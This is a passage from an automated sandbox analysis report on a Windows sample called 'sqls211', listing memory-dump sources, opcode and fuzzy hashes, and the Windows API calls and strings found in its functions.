                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c9e8f863423ef4e4540aa3dd23da30d753adef11de3c81f3744518a01fde8c4a
                                                                                                            • Instruction ID: cbd4fcb8d72f10f3037188f29dcffc4ef13c216df833b8a843ac56a5aa4b8320
                                                                                                            • Opcode Fuzzy Hash: c9e8f863423ef4e4540aa3dd23da30d753adef11de3c81f3744518a01fde8c4a
                                                                                                            • Instruction Fuzzy Hash: B651D3715083D58FD712CF24C18096EBFE2AE9A714F4909ADE4E95B243C231DB4BDB62
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1e3ba205f6b5493a7f5c70399d4233292b3cd57955f9dc0524b3faab8f1ff9ca
                                                                                                            • Instruction ID: 94482213c493999be2c0142c345e7507de57e993577bd0e967719f7bd64c6981
                                                                                                            • Opcode Fuzzy Hash: 1e3ba205f6b5493a7f5c70399d4233292b3cd57955f9dc0524b3faab8f1ff9ca
                                                                                                            • Instruction Fuzzy Hash: DF51E2B1A087119FC748CF19D48065AF7E1FF88314F058A2EE899E3340D734E959CB9A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                                            • Instruction ID: 06d3a27e9a71f61af07d947a22166c4eb594c98390c8c90c9b059b12e6351926
                                                                                                            • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                                            • Instruction Fuzzy Hash: D1312AB1A1474A8FCB18DF28C85126EBBE0FB95304F50452EE5D5C7781C734EA0ACB92
                                                                                                            APIs
                                                                                                            • _swprintf.LIBCMT ref: 00CCE30E
                                                                                                              • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                                                                              • Part of subcall function 00CD1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00D01030,00000200,00CCD928,00000000,?,00000050,00D01030), ref: 00CD1DC4
                                                                                                            • _strlen.LIBCMT ref: 00CCE32F
                                                                                                            • SetDlgItemTextW.USER32(?,00CFE274,?), ref: 00CCE38F
                                                                                                            • GetWindowRect.USER32(?,?), ref: 00CCE3C9
                                                                                                            • GetClientRect.USER32(?,?), ref: 00CCE3D5
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00CCE475
                                                                                                            • GetWindowRect.USER32(?,?), ref: 00CCE4A2
                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00CCE4DB
                                                                                                            • GetSystemMetrics.USER32(00000008), ref: 00CCE4E3
                                                                                                            • GetWindow.USER32(?,00000005), ref: 00CCE4EE
                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00CCE51B
                                                                                                            • GetWindow.USER32(00000000,00000002), ref: 00CCE58D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                                            • String ID: $%s:$CAPTION$d
                                                                                                            • API String ID: 2407758923-2512411981
                                                                                                            • Opcode ID: 79d61e2fbd90e369e42c87b0057d10969ef3e38a4fc89ab8950f3f8c98b2a339
                                                                                                            • Instruction ID: 9f7dab9751ea383abf3d05121b62f6a968034305acb4cc82fa74c4e29333c29e
                                                                                                            • Opcode Fuzzy Hash: 79d61e2fbd90e369e42c87b0057d10969ef3e38a4fc89ab8950f3f8c98b2a339
                                                                                                            • Instruction Fuzzy Hash: 54819272208341AFD711DFA8CD89F6FBBE9EB89704F04092DFA95D7250D634E9058B62
                                                                                                            APIs
                                                                                                            • ___free_lconv_mon.LIBCMT ref: 00CECB66
                                                                                                              • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC71E
                                                                                                              • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC730
                                                                                                              • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC742
                                                                                                              • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC754
                                                                                                              • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC766
                                                                                                              • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC778
                                                                                                              • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC78A
                                                                                                              • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC79C
                                                                                                              • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC7AE
                                                                                                              • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC7C0
                                                                                                              • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC7D2
                                                                                                              • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC7E4
                                                                                                              • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC7F6
                                                                                                            • _free.LIBCMT ref: 00CECB5B
                                                                                                              • Part of subcall function 00CE8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CEC896,00CF3A34,00000000,00CF3A34,00000000,?,00CEC8BD,00CF3A34,00000007,00CF3A34,?,00CECCBA,00CF3A34), ref: 00CE8DE2
                                                                                                              • Part of subcall function 00CE8DCC: GetLastError.KERNEL32(00CF3A34,?,00CEC896,00CF3A34,00000000,00CF3A34,00000000,?,00CEC8BD,00CF3A34,00000007,00CF3A34,?,00CECCBA,00CF3A34,00CF3A34), ref: 00CE8DF4
                                                                                                            • _free.LIBCMT ref: 00CECB7D
                                                                                                            • _free.LIBCMT ref: 00CECB92
                                                                                                            • _free.LIBCMT ref: 00CECB9D
                                                                                                            • _free.LIBCMT ref: 00CECBBF
                                                                                                            • _free.LIBCMT ref: 00CECBD2
                                                                                                            • _free.LIBCMT ref: 00CECBE0
                                                                                                            • _free.LIBCMT ref: 00CECBEB
                                                                                                            • _free.LIBCMT ref: 00CECC23
                                                                                                            • _free.LIBCMT ref: 00CECC2A
                                                                                                            • _free.LIBCMT ref: 00CECC47
                                                                                                            • _free.LIBCMT ref: 00CECC5F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                            • String ID:
                                                                                                            • API String ID: 161543041-0
                                                                                                            • Opcode ID: 8421841d45942cd3fd3fa13244151abf3cc91656ae64275534d8b99e54d5bc44
                                                                                                            • Instruction ID: 07c35552de85e267b00680d9384c084dd3edcffb51d1eb35a4b8eaf94932f35c
                                                                                                            • Opcode Fuzzy Hash: 8421841d45942cd3fd3fa13244151abf3cc91656ae64275534d8b99e54d5bc44
                                                                                                            • Instruction Fuzzy Hash: 47315C316003869FEB20AA3ADC86B5A77E9BF10310F245429F56CD7192DF35EE45DB10
                                                                                                            APIs
                                                                                                            • _wcslen.LIBCMT ref: 00CD9736
                                                                                                            • _wcslen.LIBCMT ref: 00CD97D6
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00CD97E5
                                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00CD9806
                                                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00CD982D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                                                            • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                            • API String ID: 1777411235-4209811716
                                                                                                            • Opcode ID: 8d493eedb374a554efefcdd23f9e2ee53f69abf64ba437a46bde7494e18f8d17
                                                                                                            • Instruction ID: ad2d56a3adaa5945573440aec76031bdf0ffc490b6dd6441e9136d78f966f700
                                                                                                            • Opcode Fuzzy Hash: 8d493eedb374a554efefcdd23f9e2ee53f69abf64ba437a46bde7494e18f8d17
                                                                                                            • Instruction Fuzzy Hash: CA3135361083817BE725AB21AC46F6FB7ACEF42720F14011FF611972D2EB749A0493A6
                                                                                                            APIs
                                                                                                            • GetWindow.USER32(?,00000005), ref: 00CDD6C1
                                                                                                            • GetClassNameW.USER32(00000000,?,00000800), ref: 00CDD6ED
                                                                                                              • Part of subcall function 00CD1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00CCC116,00000000,.exe,?,?,00000800,?,?,?,00CD8E3C), ref: 00CD1FD1
                                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00CDD709
                                                                                                            • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00CDD720
                                                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 00CDD734
                                                                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00CDD75D
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00CDD764
                                                                                                            • GetWindow.USER32(00000000,00000002), ref: 00CDD76D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                                            • String ID: STATIC
                                                                                                            • API String ID: 3820355801-1882779555
                                                                                                            • Opcode ID: e8a3ee29a8e45c6855a2a507dd9afcf1948afcd99381cac99d1c740920cde545
                                                                                                            • Instruction ID: f02a7983ed587fc2f8e2530f4c0f015479fb2ae6304f3ea1248e0c0fd75f7476
                                                                                                            • Opcode Fuzzy Hash: e8a3ee29a8e45c6855a2a507dd9afcf1948afcd99381cac99d1c740920cde545
                                                                                                            • Instruction Fuzzy Hash: EF1136729007107BE2316B709C4AFAF765CAF50701F014122FB22E23D5DA68CB4652B5
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 00CE9705
                                                                                                              • Part of subcall function 00CE8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CEC896,00CF3A34,00000000,00CF3A34,00000000,?,00CEC8BD,00CF3A34,00000007,00CF3A34,?,00CECCBA,00CF3A34), ref: 00CE8DE2
                                                                                                              • Part of subcall function 00CE8DCC: GetLastError.KERNEL32(00CF3A34,?,00CEC896,00CF3A34,00000000,00CF3A34,00000000,?,00CEC8BD,00CF3A34,00000007,00CF3A34,?,00CECCBA,00CF3A34,00CF3A34), ref: 00CE8DF4
                                                                                                            • _free.LIBCMT ref: 00CE9711
                                                                                                            • _free.LIBCMT ref: 00CE971C
                                                                                                            • _free.LIBCMT ref: 00CE9727
                                                                                                            • _free.LIBCMT ref: 00CE9732
                                                                                                            • _free.LIBCMT ref: 00CE973D
                                                                                                            • _free.LIBCMT ref: 00CE9748
                                                                                                            • _free.LIBCMT ref: 00CE9753
                                                                                                            • _free.LIBCMT ref: 00CE975E
                                                                                                            • _free.LIBCMT ref: 00CE976C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: 2bbd228600dfcb42a189b381569f24a39f7efd25d74fd80bb0d924f88bcbabea
                                                                                                            • Instruction ID: 97e97c6c3d0971b6da03d38c8d2b9ca87f69917969da4952af207fad62715136
                                                                                                            • Opcode Fuzzy Hash: 2bbd228600dfcb42a189b381569f24a39f7efd25d74fd80bb0d924f88bcbabea
                                                                                                            • Instruction Fuzzy Hash: F411A27611014AAFCB01EF96CC82CD93BB5EF14350B5555A1FA088F262DE32EB54AB84
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                                            • String ID: csm$csm$csm
                                                                                                            • API String ID: 322700389-393685449
                                                                                                            • Opcode ID: a041ae40a5b70dc155cb3faf34385d0e8fa93f2a61db85014bb817fac695dae5
                                                                                                            • Instruction ID: 8b221ff6eccb783a14d4ccef9b9fb231c4923c2f7c63c414753f11cb3a37fafc
                                                                                                            • Opcode Fuzzy Hash: a041ae40a5b70dc155cb3faf34385d0e8fa93f2a61db85014bb817fac695dae5
                                                                                                            • Instruction Fuzzy Hash: 80B18D719002D9EFCF25DFA6C8859AEB7B9FF04310F14416AE8116B212D731EB51DB91
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 00CC6FAA
                                                                                                            • _wcslen.LIBCMT ref: 00CC7013
                                                                                                            • _wcslen.LIBCMT ref: 00CC7084
                                                                                                              • Part of subcall function 00CC7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CC7AAB
                                                                                                              • Part of subcall function 00CC7A9C: GetLastError.KERNEL32 ref: 00CC7AF1
                                                                                                              • Part of subcall function 00CC7A9C: CloseHandle.KERNEL32(?), ref: 00CC7B00
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                            • API String ID: 3122303884-3508440684
                                                                                                            • Opcode ID: 7cb8822b917b5f6de4cff095abfcec58aa918ed009c211e327451ced893cc88e
                                                                                                            • Instruction ID: 5dbcb383ebd6ef09d2ae41895b61a45cb6145fa3213d24bf275f61f230db643d
                                                                                                            • Opcode Fuzzy Hash: 7cb8822b917b5f6de4cff095abfcec58aa918ed009c211e327451ced893cc88e
                                                                                                            • Instruction Fuzzy Hash: 674119B1D083887AEB20E770DD46FEE776CDF14344F04055EFA5AA7182D674AB449B21
                                                                                                            APIs
                                                                                                              • Part of subcall function 00CC1316: GetDlgItem.USER32(00000000,00003021), ref: 00CC135A
                                                                                                              • Part of subcall function 00CC1316: SetWindowTextW.USER32(00000000,00CF35F4), ref: 00CC1370
                                                                                                            • EndDialog.USER32(?,00000001), ref: 00CDB610
                                                                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 00CDB637
                                                                                                            • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00CDB650
                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00CDB661
                                                                                                            • GetDlgItem.USER32(?,00000065), ref: 00CDB66A
                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00CDB67E
                                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00CDB694
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                            • String ID: LICENSEDLG
                                                                                                            • API String ID: 3214253823-2177901306
                                                                                                            • Opcode ID: d9df71901ab638029a6794c95efb5ff9763f92bba2e70b3090cc4bec05f16774
                                                                                                            • Instruction ID: 5bf5ea699c2ba75b74370fe73ffe60e035f3da6c2ab8921c89bdebe47a08b06e
                                                                                                            • Opcode Fuzzy Hash: d9df71901ab638029a6794c95efb5ff9763f92bba2e70b3090cc4bec05f16774
                                                                                                            • Instruction Fuzzy Hash: 23219E32604305BBD2259F66ED4AF7B3B6DEB46B81F024016F704D23A0CB56DE03A675
                                                                                                            APIs
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,752EA19E,00000001,00000000,00000000,?,?,00CCAF6C,ROOT\CIMV2), ref: 00CDFD99
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00CCAF6C,ROOT\CIMV2), ref: 00CDFE14
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 00CDFE1F
                                                                                                            • _com_issue_error.COMSUPP ref: 00CDFE48
                                                                                                            • _com_issue_error.COMSUPP ref: 00CDFE52
                                                                                                            • GetLastError.KERNEL32(80070057,752EA19E,00000001,00000000,00000000,?,?,00CCAF6C,ROOT\CIMV2), ref: 00CDFE57
                                                                                                            • _com_issue_error.COMSUPP ref: 00CDFE6A
                                                                                                            • GetLastError.KERNEL32(00000000,?,?,00CCAF6C,ROOT\CIMV2), ref: 00CDFE80
                                                                                                            • _com_issue_error.COMSUPP ref: 00CDFE93
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                            • String ID:
                                                                                                            • API String ID: 1353541977-0
                                                                                                            • Opcode ID: 570b7edee6633d65d8514a2e8a7b7f0a22c59ddca8e73e6598af231a83cb848e
                                                                                                            • Instruction ID: 16c1c7d2a3311061220dbafdef9f074fb83e4c6c3ac5a5ad70f61f0d79630d8f
                                                                                                            • Opcode Fuzzy Hash: 570b7edee6633d65d8514a2e8a7b7f0a22c59ddca8e73e6598af231a83cb848e
                                                                                                            • Instruction Fuzzy Hash: 824138B1A00248ABDB109F65CC45BAEBBA8FF44710F14423FFA16E7351D7349A01C7A5
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog
                                                                                                            • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                                            • API String ID: 3519838083-3505469590
                                                                                                            • Opcode ID: a3aaa0be0d501fb7b7e20a7f28bffa99cc909c3451aa889f7e5f5bdbe6a8fb10
                                                                                                            • Instruction ID: 01b7350b5a9d95961e40c0feb5bf08f966433e03c56ed3b577a8b6b96dd08e62
                                                                                                            • Opcode Fuzzy Hash: a3aaa0be0d501fb7b7e20a7f28bffa99cc909c3451aa889f7e5f5bdbe6a8fb10
